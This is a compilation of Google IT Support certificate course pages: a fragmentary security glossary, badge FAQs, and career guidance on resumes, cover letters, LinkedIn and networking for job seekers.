Key escrow: Allows encryption key to be securely stored for later retrieval by an authorized
party

the DAP

MD5: A popular and widely used hash function designed in the early 1990s as a cryptographic
hashing function
and clients



Normalization: It's the process of taking log data in different formats and converting it into a
standardized format that's consistent with a defined log structure
data with
to
Function 2

lock
Platform key: It's the public key corresponding to the private key used to sign the boot files
Public key signatures: Digital signature generated by composing the message and combining
it with the private key

messages over time
sort of ransom
Secure boot protocol: It uses public key cryptography to secure the encrypted elements of
the boot process

Security information and event management systems (SIEMS): Form of centralized logging
for security administration purposes
certificate
sent back and forth
published in 1995
secure
Single Sign-on (SSO): An authentication concept that allows users to authenticate once to be
granted access to a lot of different services and applications
of computers
Software signing certificate: Trust mechanism where a software vendor can

cryptographically sign binaries they distribute using a private key
database

to
ciphertext
decrypt messages


with new headers
network to another


W
public keys
network

of TACACS
Course 5 Glossary
Course 5 Glossary
To use the template for this course item, click the link below and select “Use Template.”
Link to glossary: Course 5 Glossary
OR
If you don’t have a Google account, you can download the template directly from the
attachment below.
C5 Glossary
DOCX File
Congratulations on all you've accomplished.

What you have achieved is no small feat,
it's very difficult to dive into a topic that you know nothing about.
And from the very beginning to become the expert that you are now.
>> You've done a lot of work, it's been an incredible journey.
>> These are all not easy concepts to get but you made it through the whole thing.
>> It's an amazing accomplishment and you should be really proud of yourself.
>> Congrats, that's great work.
>> Congratulations.
>> Congratulations.
>> Congratulations.
>> Congratulations.
>> Congratulations.
>> You're probably exhausted right now but congratulations.
And I hope that all this was super exciting and
that you're really excited about where you can take this now.
>> Congratulations, you've made it.
Your through the program, now get out there and get a job and
get your career started.
Information and FAQs about badges
Congratulations on finishing the last course of the Google IT Support Professional Certificate! What an
accomplishment.
Learners who complete all five courses of this certificate are eligible to earn a digital badge from Credly
and Google.
Additionally, Google and CompTIA have teamed up to offer a co-skilled badge of completion. To get the
badge, learners must complete the Google IT Support Professional Certificate and pass the CompTIA A+
certification exams (1000 Series). With this dual badge, people who complete the Google IT Support
Professional Certificate and receive the CompTIA A+ certification are better set up to share their skills with
potential employers.
More details are in the FAQs below. For any other questions, including issues with your certificate, please
reach out to Coursera Learner Services.
About badges
What is a badge?
A badge is a visual representation of a credential you’ve earned - in this case, your credential is the Google
IT Support Professional Certificate! You’ll get a badge upon completion of the program; you can share it on
platforms like LinkedIn to catch the attention of potential employers.
What is Credly/Acclaim?
Acclaim is a badging platform that’s part of Credly, a leading digital credential service provider. Acclaim
provides badges so that you can easily share your achievements to online destinations like LinkedIn, and
employers can instantly verify your skills.
How do I add my badges to my LinkedIn profile?
Follow the steps in this Acclaim article to add your badge to your LinkedIn. You can also check out this
YouTube video.
About the Google badge
How do I claim my badge for completing the Google IT Support Professional Certificate?
Upon completion of the certificate, you will receive an email letting you know you have earned a badge.
From the email, you can choose to claim the badge and opt in to share your information for the purposes of
badge issuing. If you decide to claim the badge, Coursera will then send a request to Acclaim to issue your
badge. If you don’t have an Acclaim account yet, you will be asked to create one before you can accept and
view your badge.
Please allow at least one week from your date of completion for the system to update. Make sure to check
your spam folder just in case it ends up there!
I completed the Google IT Support Professional Certificate program. What do I do if I have not received
an email invite to claim my badge?
If you’ve waited a week since you completed the certificate and haven’t received an email, please submit a
request through the Acclaim help center: https://support.youracclaim.com/hc/en-us.
When will I receive my badge?
Badges are sent out daily to learners who have completed all five courses of this Professional Certificate.
Please allow at least one week from your date of completion for the system to update.
About the Google and CompTIA dual badge
How do I know if I am eligible to get the Google/CompTIA dual badge?
If you complete all five courses of the Google certificate and pass the CompTIA A+ certification exams (1000
series), you’ll have access to a new dual badge from CompTIA and Google that you can also post on
LinkedIn to catch the attention of potential employers. Learn more here.
What is the difference between the dual badge with CompTIA and the badge for the Professional
Certificate?
The dual badge shows that you completed both the Google IT Support Professional Certificate and passed
the CompTIA A+ certification exams (1000 series). The Professional Certificate badge only shows your
completion of the Google IT Support Professional Certificate. If you earn both badges, you’re basically a
rockstar and we encourage you to share them both on LinkedIn to show off your rockstar status.
I completed the Google IT Support Professional Certificate program and I passed the CompTIA A+
exams but did not receive an email from Acclaim to claim the dual badge. What do I do?
Please submit a request through the Acclaim help center for technical issues:
https://support.youracclaim.com/hc/en-us.
Will completing the Google certificate prepare me for the CompTIA A+ exams?
The Google IT Support Professional Certificate program aligns with the objectives covered by the newly
updated CompTIA A+ certification. Upon completion of the certificate program, you can download the
CompTIA A+ exam objectives to ensure that you’ve studied what you need to before taking the exams.
When will I receive my badge?
Dual badges are delivered within 2 weeks of completion of both the Google certificate and CompTIA exams.
Tailoring your Resume for IT Support

As you prepare for your job search, you will need to create or update your resume to reflect
your experience in order to apply for IT support roles. You have learned so much during this
course, and it is important that your resume reflects that. An effective resume highlights your
skills and experience and is tailored to the position you are applying for. Let’s explore how to
make your resume stand out by incorporating your new IT support skills and your previous
experience.
Tailor the content

 Identify what is important to the potential employer. What does the employer want
to know about you? Make sure that you carefully read the job description and notice
which skills are mentioned. You can also read several job descriptions for the same
type of role to identify which skills and requirements show up frequently. For instance,
although specifics will vary by role and employer, many IT support-related roles
require the ability to effectively organize and coordinate across teams and projects,
manage multiple tasks simultaneously, and communicate effectively. You should take
note of these skills and be sure to highlight them using similar terms on your resume.
 Create one primary IT support resume to edit and tailor to each job application. You
should make sure that the order of your skills and qualifications matches the job
description. In doing this, you are making sure that the things that are most important
to the employer are at the top.
 Match the language used in the job description. Some employers use automation
software to filter resumes. If the job description uses keywords like procurement and
risk management, make sure your resume uses those keywords, too.
 Use IT support terminology. This will help the person reading your resume
understand how your past experience is relevant to an IT support role.
 Decide what not to include on your resume. You may have some skills that are
important to you, but those same skills may confuse or distract the hiring managers
reading your resume.
 Highlight how your experience and skills are relevant to IT support. If you have
been working as a data entry but want to begin as an IT support help desk, your CRM
software skills will be essential in your new role. Make sure to point out how those
skills will be beneficial to the employer.
Choose an appropriate format

No matter what layout or template you choose for your resume, there are several things you
should keep in mind
 The design of your resume should be simple and easy to understand for both human
and artificial intelligence readers. You don’t want your resume to be discarded before
a real person has a chance to read it!
 Your resume should be easy to read and communicate all of the important
information in short bullet points.
 Your resume should be one- to two-pages long and contain only the last ten to fifteen
years of relevant experience. It is appropriate to use two columns on a one-page
resume, but if your resume is two pages, be sure to use the entire width of the page.
Update the relevant sections

Once you have determined the appropriate format for your resume, you will need to update
each of your resume’s major sections, which include:
 Contact information
 Professional summary
 Core competencies
 Professional experience
 Education and certifications
Pro tip: Resumes should be written in the third person and should not contain personal
pronouns.
Let’s discuss how to incorporate your new skills into these sections of your resume.
Contact information
Your header should contain your contact information and should go at the top of your
resume.
 Your header should include the following information:

o Your name in a larger font than the rest of your resume
o The city and state you live in (you do not need to include your street address
for privacy purposes)
o Your phone number and alink to your email address
o Link to your LinkedIn profile URL
o Links to any other personal websites or portfolios, if applicable to the role you
are applying for
 Your header should be relevant, simple, and easy to read. Here is an example of a
resume header:
Professional summary
Below your header, include a professional summary.
 Use your summary to set the tone. Your summary should be one to three lines and
should clearly state why you are the best candidate for the position. It should
showcase the most important things you want the reader to know about you. If you
are applying for a new role, you will want to update your industry specialty. You likely
have experience that can be related to IT support, and you will want to incorporate
that relevant experience into your new professional summary. Make sure you tailor
your description of yourself to the role you are applying for.
 Merge the description of the role you are applying for with your experience. Here is
an example:
o IT support technician with two years of demonstrated success in network
installation. Skilled in cross-functional collaboration and project execution.
Articulate communicator who thrives in a results-driven collaborative
environment.
 Use keywords from the job description to describe yourself. If the job description
states that the company is looking for a candidate with knowledge of IT security, you
should add that to your resume—you have gained that knowledge with this
certification.
Once you have your professional introduction, your next sentence should describe how your
unique expertise will make you valuable to the employer.
Pro tip:Don’t forget to use this section to highlight something that makes you stand out from
other applicants. Use an accomplishment from a previous role to show the employer what
you can offer them. Take a look at this example of a professional summary section:
Now that you have your heading and professional summary updates, let’s move on to the
core competencies section of your resume.
Core competencies
Your core competencies should be a bulleted list of the most relevant skills applicable to the
position you are applying for.
Pro tip: Scan the job description for core competencies you have gained during this
certification and your past experience then use those skills as bullet points in this section.
Make sure to keep this section relatively short, with four to eight bullets. Here is an example
of a IT support resume core competencies section:
Now that you have showcased who you are and what makes you the best candidate for the
job, it is time to tell the story of what you have accomplished throughout your career in the
professional experience section.
Professional experience
The professional experience section of your resume provides a summary of the roles and
positions you have held in your career. List at least three positions in reverse chronological
order and only include what is most relevant to the position you are applying for.
Your professional experience will not change much from previous resumes, because you can’t
change the past roles you have held. However, you can possibly rewrite some of your bullets
to relate them to IT support. Make sure you are tying the industry lingo back to your previous
experience to show the reader—usually a hiring manager—how your skills relate to IT
support.Use terms like assessing compatibility, evaluating system, testing, implementation,
software maintenance and customer support to show the reader that your past experience
translates to an IT support role.
Pro tip: Make sure your resume conveys how your past accomplishments are valuable to the
role you are applying for. Show the reader how you can make a difference in their
organization. An easy way to remember this is through the P.A.R.I.S. framework:
 Problem that needed to be solved

 Action(s) I took
 Result of action(s)
 Impact on project (users, quality, etc.)
 Supporting evidence (awards, bonus, etc.)
Below is an example of a professional experience section from an IT support’s resume:
Education and certifications
Now that the majority of your resume has been updated with your new skills and knowledge,
it is time to update your Education and Certifications section. In this section of your resume,
you should include any degrees beyond your high school diploma in reverse chronological
order. For each degree, list the degree you earned, institution, location, and date of
graduation. This section should also list any professional certifications or credentials you
hold. It is here where you will list this new IT support certification. Here is an example of an
education and credentials section of an IT support resume:
Your resume is now updated and ready to use for IT support position applications! You have
revised your professional summary, added newly-acquired core competencies, related past
professional experience to IT support, and added this certification to your resume.
Pro tip:It is always a good idea to have someone review your resume for any spelling or
grammatical errors. Recruiters and hiring managers often toss resumes aside that contain
typos. Once you are sure your resume is error-free, it is time to start your job search!
IT Support Resume Sample
Finding your Path and Perfect Role

As you begin your career, you’ll have to navigate your way to find the perfect role for you.
While there is no one way to find your ideal role, there are some things to consider to help you
better understand what direction you want to take. This reading will focus on a few of the
options to consider as you start to search for a job.
Generalist vs specialist
Another category to consider when attempting to find your right path is whether you want to
work as a generalist or a specialist. A generalist is knowledgeable about many topics and has
various interests, while a specialist is an expert in a specific field.
Generalists have broad, multifaceted roles that allow entry-level employees to gain
invaluable experience in many different areas related to the field. Alternatively, specialists are
focused on a singular aspect of IT. The table below provides an overview of common
generalist and specialist roles.
Common Generalist Roles
IT Support Specialist

 IT Consultant
 Project Manager
 IT Manager
 Lead Technician
Common Specialist Roles
 Systems Administrator
 Network Administrator
 Field Service Technician
 IT Support Administrator
Please note that the word “specialist” is often used in job titles, even for roles that include
generalist-like tasks. When reviewing a job listing, be sure to read the duties and
responsibilities assigned to that role so that you have a clear understanding of what you will
be doing if hired.
Choose your work environment
Choosing what type of environment works best for you is just as important as the type of role
you select. Different types of environments have their own cultures and practices. As an
entry-level employee, you’ll come across two types of workplaces: agency or in-house. You
can also choose to work for yourself in a freelance role.
Agency vs In-house teams

In the IT field, agencies help other businesses perform a specific function related to
troubleshooting, maintenance, or administration. Agencies can support large or small
companies and often work independently from the business they’ve been hired for outside of
the determined needs.
As an entry-level employee, you can expect to work for several clients. This is because
agencies often take on many different clients. It is common to work with a client for a short
time. While doing agency work, it’s unlikely that you will decide on the direction of
assignments since those are determined by the company that hired your agency’s services.
Alternatively, companies who create and distribute a product or a service may build an “in-
house” team of internal employees to handle their IT needs.There are many reasons
companies choose this option, including reduced costs, full transparency between the team
and the larger company, and concern for the privacy of their users and their personal
information.
As an entry-level employee, you can expect to work on a team that is relatively smaller than
the rest of the company. Unlike working at an agency, many employees on an in-house team
have the opportunity to learn a great amount about the company they are performing IT
tasks for.
Key takeaways
As you navigate your job search, think about what you want in a career. Establish the types of
roles you want early on and the type of company you want to work for. Over time, your
experience will help you make better-informed decisions related to your career direction.
1.
Question 1
This is an optional activity. To "pass" this practice quiz, you must receive 100%, or 1 out of 1 point, by
completing the activity below.
Activity overview
In this activity, you will create a job search project plan to help you track your progress and expectations
during your job search.
Be sure to complete this activity before moving on. Once you have completed it, you will have a project
plan you can use to help you when you search for a job.
Step-By-Step Instructions
Part 1 - Create and track your job search plan

Step 1: Access the template
Click the link to create a copy of the template. If you don’t have a Google account, download the template
directly from the attachment below.
Link to template: Job Search Plan Template
OR
Download template attachment:
Activity Template_ Job search project plan
XLSX File
Step 2: Choose an industry or specialty
Since project managers work in nearly every industry, the first step in job search is choosing an industry or
specialty. Reflect on your passions, what communities you’d like to work with, or what work gets you
excited, and investigate project management opportunities in those areas. Here are some more examples
of industries you can explore:
 Business
 Construction
 Government
 Education
 Finance
 Marketing
Check that you are in the Job Tracker tab. Once you have determined your preferred industry, record it in
the Industry column.
Step 3: Explore and determine your desired job
Now that you know what industry you’re searching in, it’s time to get specific. For example, if you chose the
education industry, there are many avenues you can take as an IT Support professional. You could work in
education, government positions, or commercial businesses.
If you’re unsure what kinds of opportunities are available, search for a company in the industry of your
choice and review the career opportunities for IT support roles. Once you’ve found a job you are interested
in, record the company, job title in the appropriate columns. Paste the link to the job description under Job
Link.
Step 4: Track your networking
Networking can be a great tool that can lead to potential job opportunities. If you apply for a job through a
referral, record the name and contact information of the person who referred you under Referral Name
and Referral Contact Information.
Step 5: Customize your resume and apply (Optional)
Tailor your resume and cover letter to reflect the language used in the job description and apply as soon as
possible. Refer to the activity on creating a resume to help prepare for your job search.
Once you've applied to the job, identify the resume you used under Resume Used and the date on which
you applied under Date Applied.
Step 6 (Optional): Prepare for and schedule your first interview
If you schedule an interview with a recruiter, record the interview date, your interviewer’s name, and your
interviewer’s contact information in the next three columns.
Step 7 (Optional): Thank your interviewer
Once you’ve successfully completed your first interview, make sure to send a thank you email to your
interviewer within 24 hours. Remind them of who you are, what job you applied for, and thank them for
their time. Your interviewer will likely appreciate your courtesy, which will make you more memorable.
Don't forget to record the date you send the thank you email under Follow-up Email Date.
Step 8: (Optional) Prepare for further interviews
As you move forward in the application process, you will likely have at least one or two more interviews.
Log any further information in remaining columns.
Step 9: Keep trying
Successfully applying to and landing a job is a competitive and difficult process. No matter the outcome of
a certain application, persistence pays off!
Part 2 - Cultivate and maintain your networking relationships (Optional)

Networking is a critical tool in your job search, as it can help you learn about new job opportunities, gain
information on your target industry, and help open doors for your career. Cultivate your network of former
and current coworkers, and use online networking platforms like LinkedIn to connect to others in your
target industry. (Review the activity on setting up a professional social media profile to help you get
started.) Letting your network know about your interest in project management could lead to
informational interviews with those in your target field, or referrals for job openings. Be sure to keep track
of each connection you make, and each new opportunity that arises.
Step 1: Open Tab 2 of the template
Now, go to the Network Tracker tab.
Step 2: Fill in personal contact information
Once you’ve connected with someone, you should track your relationship with them. Record the date of
your first meeting, the person’s name, and their contact information in the first three columns.
Step 3: Record professional takeaways
Make note of anything new you learned about the industry or job from your conversation under Key
Questions. Pay close attention to any issues that your contact deems important.
Step 4: Recollect on common ground
It is also helpful to remember interesting details or stories from your conversation, both personal and
professional. Write down any professional tips, common interests, or fun facts from your conversation
under Professional Takeaways and Personal Talking Points. You can use these details to build on your
connection with your contact the next time you connect with them.
Step 5: Brainstorm further questions
You will most likely have more questions after your first networking session. Record these under Further
Questions. You can use these questions to reconnect with your contact or ask future contacts.
Step 6: Schedule your next meeting

Estimate the date you next want to reach out to your contact. After your first meeting, the six-month mark
is a good choice, although it could be sooner depending on your level of connection or if you agreed on
next steps when speaking with them. Record the date you plan to reach out again under Next Outreach.
Pro Tip: Save the template

Finally, be sure to save a blank copy of the job search project plan template you used to complete this
activity. You can use it for further practice or in your own personal or professional projects.
What to Include in Your Response
Be sure to address the following elements in your completed job search project plan:
Job Tracker Tab 1 should include:
Industry
Company
Job Title
Job Link
Network Tracker Tab 2 (Optional) should include:
 Contact information
 First meeting date
 Professional takeaways
 Common interests or fun facts
 Further questions to ask
 The date you plan to reach out again
Did you complete this self-review activity?
1 point
Yes
No
Coursera Honor Code Learn more
I, Ronald Shiundu, understand that submitting work that isn’t my own may result in permanent failure of
this course or deactivation of my Coursera account.
SubmitSave draft
Like
Dislike
Report an issue
Personal Branding
Personal Branding
Having a good resume and an excellent elevator pitch are important. They will show
employers your skills and your work history, and they will give you a chance to impress
employers with what you have done, and what you can do for them. There is one more step
you can take to make sure you stand out from other candidates. Having your own personal
brand will make you unique and help you stand out from other candidates. This reading will
help you build your own personal brand.
Building your personal brand
Your personal brand represents you, so the first part of personal branding is to look at
yourself and see what makes you unique. Brands represent what they are. Product makers
use branding to help people notice their products, and to develop people’s trust in their
products and keep people coming back to them. You need to build a brand that does the
same things for you.
Taking an inventory of yourself
Taking an inventory of your skills, interests, and things that motivate you will give you a start
in building your personal brand. You can build an inventory in any order that works best for
you. Here are some examples of inventory questions:
 What drives you to pursue the career you chose?

 Which of your talents and skills mean the most to you?
 What is something you did in the past you are very proud of doing?
 What kinds of tasks or projects give you the most energy?
 Think about people you admire. What do you admire about them?
 What are your strengths and weaknesses?
These are examples, but you can use them to make your own inventory questions as well.
Write the questions and the answers and keep them in a notebook or journal.
Get to know your audience

Now that you have your personal inventory, get to know your audience.
 Study your potential employers and learn all about their organizations. Look for their
values and goals and see how you can align your goals and values with theirs.
 Identify who their influencers are. Once you know about the companies offering
positions, study their needs based on what the job offers say.
 Identify who the stakeholders are who have the most interest in your services.
 Look at your inventory and match what you know about yourself to those companies’
needs. Your talents, your skills, the things that give you energy, your strengths, your
knowledge and experience, and the rest of the information you put together in your
inventory are all part of the recipe for your personal brand. Now that you have the
information you need, you can start putting together your brand.
Identify some challenges the companies are facing
People often choose products because those products help them deal with a challenge or
challenges. Brands help them remember the products, so they look for those products as
soon as they have those challenges. If the challenges are ongoing, they keep using those
products.
 Identify some ongoing challenges companies face dealing with IT.

 Think about solutions to those challenges, and how you can offer unique solutions to
those challenges.
 Show potential employers how having you in their organizations will benefit them
with your unique IT problem solving skills and knowledge of IT solutions.
Building your brand
Now that you have taken a personal inventory, studied your audience, and identified some
challenges your audience of potential employers face in their organizations, you are ready to
build your personal brand. Using the information you put together, write one or two
sentences that describe you and what you do.
You may need to write a few drafts before you find one you like best. Once you find the one
you think is the best, you now have a brand you can use along with resumes, elevator pitches
and cover letters to stand out from other candidates.
Key Takeaway
Having a good resume and a great elevator pitch will help you impress potential employers,
but having a personal brand will help you stand out from all the other candidates. It will give
potential employers something to remember you out of all the applicants they are looking at
for the position.
Recruiters, Headhunters and Staffing Agencies
Recruiters, Headhunters, and Staffing
Agencies
One of the many ways to apply and secure jobs in the IT industry is through recruiters,
headhunters, and staffing agencies. Sometimes it’s possible to secure a long-term position
for a company by first completing temporary or contract work through a recruitment agency.
Recruiters
There are two primary types of recruiters: external and internal. External recruiters work
outside the organization they represent, usually through a recruitment agency. These types
of recruiters can help candidates find a multitude of open positions in the industry and work
with them on a non-contractual basis until the candidate secures a position. Internal
recruiters work with the company of interest. Internal recruiters can help leverage a
candidate’s application by assisting them through the hiring process within a specific
company.
Staffing Agencies
Staffing agencies assist companies with finding qualified candidates to fulfill their open
positions. These positions range anywhere from permanent, to contract, and contract-to-
hire. The staffing agencies are responsible for recruiting and sometimes conducting entry-
level screening questions on candidates to ensure they are a good fit for the company. If the
agency can’t find a suitable fit for the job right away, they may post the job on online job
boards on behalf of the company. The company ultimately makes the final decision for who is
selected, and the staffing agency assists with the initial onboarding process.
Career Coaches
Career coaches can greatly assist with helping job seekers hone in their job search and find
positions that cater to their strengths and personal values. They can also assist with guiding
the candidate through all the ups and downs of the job hunting process, reframing thoughts,
challenging limiting beliefs about the job search process, and finding opportunities for
professional growth. However, career coaches often cost more than other routes for securing
a job. Consider hiring a career coach if you’re experiencing challenges in moving up in your
career, securing interviews, receiving offers, or are unsure about what the next steps in your
career should look like. There are multiple types of career coaches out there. Conduct
research and find the type of coach you’re looking for. Some provide basic services such as
resume reviews, editing of cover letters, or LinkedIn profile analysis. Other career coaches will
go further and offer live coaching sessions either in person or online, offer additional
resources to help you on your journey, and/or a supportive community of other job seekers.
Write a Cover Letter

Introduction:
A cover letter—a personal introduction to promote yourself—serves as a companion

document to a resume. Its main purpose is to elaborate on your professional skills,
motivations, and why you should be viewed as the best candidate for a job.
There are three types of cover letters:
 Networking—Addressed to individuals to ask for their help finding a job at their

company
 Prospecting—Addressed to companies to explore all open job opportunities
 Application—Addressed to hiring managers to emphasize your fit for a specific job
This reading focuses on helping you write application cover letters. Employers have “who,
what, where, when, why, and how” types of questions when they gather information about
job applicants. Your resume answers what (you have done), where (you worked), and when
(you were employed). Your application cover letter describes in more detail who (you are),
why (you want the job), and how (you will be successful in the role).
Body:
Prepare to write a cover letter
Pro tip: Not all job applications require a cover letter. When a cover letter is stated as being
optional, it’s best to consider how much a cover letter might improve your standing. The
following are common situations when people prefer to include a cover letter:
 When starting out in a career (early career applicant)

 When making a career transition
 When experience, education, or training isn’t an exact match with the listed
requirements
 When entering a crowded field of applicants
Many people agree that no cover letter is better than a poorly written one! Even if a cover
letter has no obvious errors, submitting a few paragraphs with very general statements isn’t
going to help you that much. Before you write a cover letter, follow these steps to ensure you
create a meaningful one.
Step 1: Research the company or organization

You can find out a lot about a company from these methods:
 Browse the company’s website

 Follow the company on social media including LinkedIn
 Perform a search on the company’s financial standing and investors, if applicable
 Perform a search on the company’s known competitors
 Ask your relatives, friends, and colleagues what they know about the company
Step 2: Inventory the required skills from the job description

Read the job description carefully and determine what you think are the most important skills
for an applicant to have and why.
Step 3: Prioritize your matching skills from strongest to weakest

Based on the skills you identified in the previous step, identify your skills that match or are
most closely aligned (associated) with them. Next, prioritize your matching skills from the
strongest to the weakest. People often skip this ordering process. Ranking your skills enables
you to emphasize your strongest skills first in your cover letter.
Parts of a cover letter
Pro tip: A cover letter is between 250-400 words in length and doesn’t exceed one page.
Review the goals for each section of a cover letter below.
Introduction
The primary goals of the introduction section of a cover letter are to:
 Identify the position you’re applying for

 Show your enthusiasm for the company
 Encourage people on the hiring team to learn more about you
Example I’m applying for the IT support specialist position, and can’t imagine a more exciting
role. As a frequent and avid user of your services, I’m eager to pursue this career opportunity.
Body Section
The goal of the body section of a cover letter is to describe how your skills apply to the open
position. Suppose the job description has these qualifications:
 Troubleshooting experience with laptops, desktops, and printers

 At least 1 year of customer service experience
 Technical problem solving with attention to detail
The following example shows how you can map your experiences to these qualifications in
the body of your cover letter.
Example
I completed the Google IT Support Professional certificate and have previous customer service
experience in retail electronics. I was responsible for helping customers choose the right devices
for their needs, and solve any problems they had with those devices. I also helped keep the
computers and printers in the location running well at the location by finding and solving any
technical problems. With my attention to detail, the IT support team will be able to solve
problems quickly and efficiently.
Pro tip: Avoid the temptation to rehash the content of your resume. A warning sign is if your
cover letter has essentially the same information as your resume but in a paragraph format.
Pro tip: Focus on what you can do for the company rather than on how you would benefit
from being hired for that position. The difference between being company-focused and self-
focused can be subtle, as in the following sentences:
 I would like to develop information technology solutions to keep your company’s IT

structure solid and provide efficiency to the company’s IT systems. (company-focused;
what you will do for the company)
 I would like to grow my IT support skills by developing IT solutions for efficient
information technology solutions I believe in. (self-focused; what you would like to
gain by being in the role)
Closing
The goal of the closing section of a cover letter is to restate your interest in the company and
position. It is also used to indicate your expectations, such as scheduling an interview, being
considered for other jobs, or a timeframe for follow up.
Example
Thank you for taking the time to review my resume for this position. I’m confident I can excel in
this role using my combined work experience and skills from the Google IT Support Professional
certificate. I’m looking forward to an interview and request the privilege to follow up on my
application’s progress in the coming weeks.
Proofread your cover letter
Many errors in cover letters are caused by copying and pasting text from one cover letter to
another. After you write your cover letter, proofread it carefully to catch these common
things:
 Awkward formality—Few people call people Sir or Madam nowadays, so you shouldn’t
use these in your cover letter either. Also refrain from using “To whom it may concern”
which sounds highly impersonal. If you don’t know the name of the hiring manager,
use “Dear Hiring Team.” Likewise, consider using “Best regards” instead of
“Sincerely” which sounds a little outdated.
 Misspelled words (especially those that sound the same but are spelled differently).
For example, “affect” and “effect,” “then” and “than,” and “your” and “you’re.”
 Mismatched skills—Make sure you aren’t incorporating skills for the wrong job
description in your cover letter. This happens with copying and pasting.
 Passive voice—Use active voice whenever possible: “I revised the ads” instead of
passive voice: “I ensured that the ads were revised.”
 Long anecdotes—Save stories that describe any past results you achieved for when
you are being interviewed.
Key takeaways
Cover letters help introduce the best points about yourself to a potential employer. Make sure
that your cover letter doesn’t simply rehash the skills outlined in your resume, but adds value
by describing how your skills align with the job requirements and how you would be
successful in the role. To write the best cover letters, it’s helpful to research the company,
identify the most important skills from the job descriptions, and prioritize and include your
matching and relevant skills.
Getting Started with LinkedIn

Introduction:
LinkedIn is a global professional network that lets you keep a resume online and link up with
recruiters looking for professionals in many fields including IT support specialists. Joining
LinkedIn is easy, and there are many opportunities available through it.
Body:
Signing up
Signing up with LinkedIn is simple. Just follow these simple steps:
1. Browse to linkedin.com
2. Click Join now.
3. After you click Join now:
1. Enter your email address and a password and click Agree & Join (or click Join with
Google to link to a Google account).
2. Enter your first and last name and click Continue.
3. Enter your country/region, your postal code, and location with the area (this helps
LinkedIn find job opportunities near you).
4. Enter your most recent job title, or select I’m a student.
5. If you entered your most recent job title, select your employment type and enter the
name of your most recent company.
6. If you select self-employed or freelance, LinkedIn will ask for your industry.
7. Click confirm your email address. You will receive an email from LinkedIn.
8. To confirm your email address, click Agree & Confirm in your email.
9. LinkedIn will then ask if you are looking for a job. Click the answer that applies. If you
select Yes, LinkedIn will help you start looking for job opportunities.
10. Follow any of the steps under Join Now that are relevant.
To upload your resume:
1. After you join LinkedIn, click on job application settings.

2. Click upload under the resume section.
3. LinkedIn will store four resumes so you can reuse them as you need them.
LinkedIn also has a resume builder that you can use to help build your resume if you are
using LinkedIn on a desktop. The resume builder only works on a desktop or laptop
computer.
Including basic information in your profile
It is a good idea to take your time filling out every section of your profile. This helps recruiters
find your profile and helps people you connect with get to know you better. Start with your
photo. Here are some tips to help you choose a great picture for your new profile:
 Choose an image that looks like you: You want to make sure that your profile is the
best representation of you and that includes your photo. You want a potential
connection or potential employer to be able to recognize you from your profile picture
if you were to meet.
 Use your industry as an example: If you are having trouble deciding what is
appropriate for your profile image, look at other profiles in the same industry or from
companies you are interested in to get a better sense of what you should be doing.
 Choose a high-resolution image: The better the resolution, the better impression it
makes, so make sure the image you choose isn’t blurry. The ideal image size for a
LinkedIn profile picture is 400 x 400 pixels. Use a photo where your face takes up at
least 60% of the space in the frame.
 Remember to smile: Your profile picture is a snapshot of who you are as a person so it
is ok to be serious in your photo. But smiling helps put potential connections and
potential employers at ease.
Adding connections
Connections are a great way to keep up to date with your previous coworkers, colleagues,
classmates, or even companies you want to work with. The world is a big place with a lot of
people. So here are some tips to help get you started.
1. Connect to people you know personally.

2. Add a personal touch to your invitation message. Instead of just letting them know
you would like to connect, let them know why.
3. Make sure your profile picture is current so people can recognize you.
4. Add value. Provide them with a resource, a website link, or even some content they
might find interesting in your invitation to connect.
Looking for a new position
On LinkedIn, letting recruiters and potential employers know that you are in the market for a
new job is simple. Just follow these steps:
1. Click the Me icon at the top of your LinkedIn homepage.

2. Click View profile.
3. Click the Add profile section drop-down and under Intro, select Looking for a new
job.
Make sure to select the appropriate filters for the new positions you might be looking for and
update your profile to better fit the role that you are applying for.
Here is an example IT Support Specialist job search.
This example shows jobs available in the United States, but there are job opportunities
available all over the world.
Keeping your profile up to date
Add to your profile to keep it complete, current, and interesting. For example, remember to
add the Google IT Support Specialist certificate to your profile after you complete the
program!
Key Takeaways
LinkedIn is a resource that lets you keep a profile online including a resume so recruiters will
always have access to anything you make public. You can use LinkedIn to look for positions
and send resumes directly to the recruiters for the positions through the LinkedIn network.
Using LinkedIn, you can find connections, search through thousands of positions offered, and
learn about companies you want to work for in your career.
How to get Interviews

HOW TO GET INTERVIEWS
This guide is designed to help job seekers get more interviews. If you’re eager to increase the number of
interviews you’re currently getting, we have some tips and strategies for you that can make a big difference
in your results and help you overcome some of the challenges associated with job boards, such as out-of-
date listings and heavy application volumes that can make it hard to stand out.
This guide will help you address the challenges of job boards through networking. Because the idea of
networking can seem daunting for many, this guide will focus on four actionable steps you can take to
make the most of your networking efforts. You’ll learn everything from how to find people to connect with
and how to schedule and prepare for important conversations, to what to talk about and how to follow up.
If some of these strategies and actions feel challenging at first, don’t worry; they get easier over time. Plus,
you’ll be getting more interviews, so it will all be worth it!
The Importance of Networking

Learning how to network effectively is a really valuable skill with a wide range of benefits. It’s something
you’ll want to continue to focus on, and the connections you make and maintain through strategic
networking can have long-lasting positive effects on your career advancement.
For our purposes here, we want to focus specifically on how strategic networking can help you overcome
some of the challenges associated with online job applications. Benefits include:
 Getting accurate information about job availability. The fact that a role is posted online doesn’t
mean that the hiring team is actively reviewing applications. There is often a delay between the
time a role is open and the time it’s posted online, as well as the time it is filled and taken down
from online job boards. At the same time, there are often open positions that are not (yet) posted
online for a variety of reasons. Networking can help you ensure you’ve got up-to-date information.
 Learning more details about the role. Job descriptions are not always precise. As a result, you
might end up applying for roles that you think are a good fit but are, in fact not. Or, you might fail
to properly tailor your application to meet the needs of the hiring team. Insider information via
networking can help you understand what the team is really looking for.
 Standing out amid the competition. Once a job is posted to a job board, there are often tens or
even hundreds of people applying to it, so it can be difficult to stand out. Networking can help you
get an early jump on a new opportunity before it’s posted.
The networking process described in this guide can help you address all these challenges.
Through a short and focused conversation with someone at your target company—who has insider
knowledge of relevant opportunities—you will be able to:
 Understand the requirements for your target role at that specific company. Jobs with the same
title can vary greatly from company to company, and the actual requirements are not always
obvious from job descriptions.
 Gain insight into the company’s organizational structure and team culture to learn what’s required
for success, and understand how best to position yourself in your application materials and
interviews.
 Learn about ways to monitor and apply for opportunities at that specific company, so you can
know exactly what’s available and how to float your application to the top of the pile. You might
even be able to get a referral.
 Establish a relationship with a professional who might be able to help you in your current job
search and be a part of your professional network moving forward.
Networking for Your Job Search: The Process
How to connect with the right people
The process of networking for your job search begins with identifying the right people to network with.
Because you are looking for insider information on the role and its application process—as well as other
relevant opportunities—you need to connect with insiders.
People you are going to network with must work in, or close to, your target role at a company you are
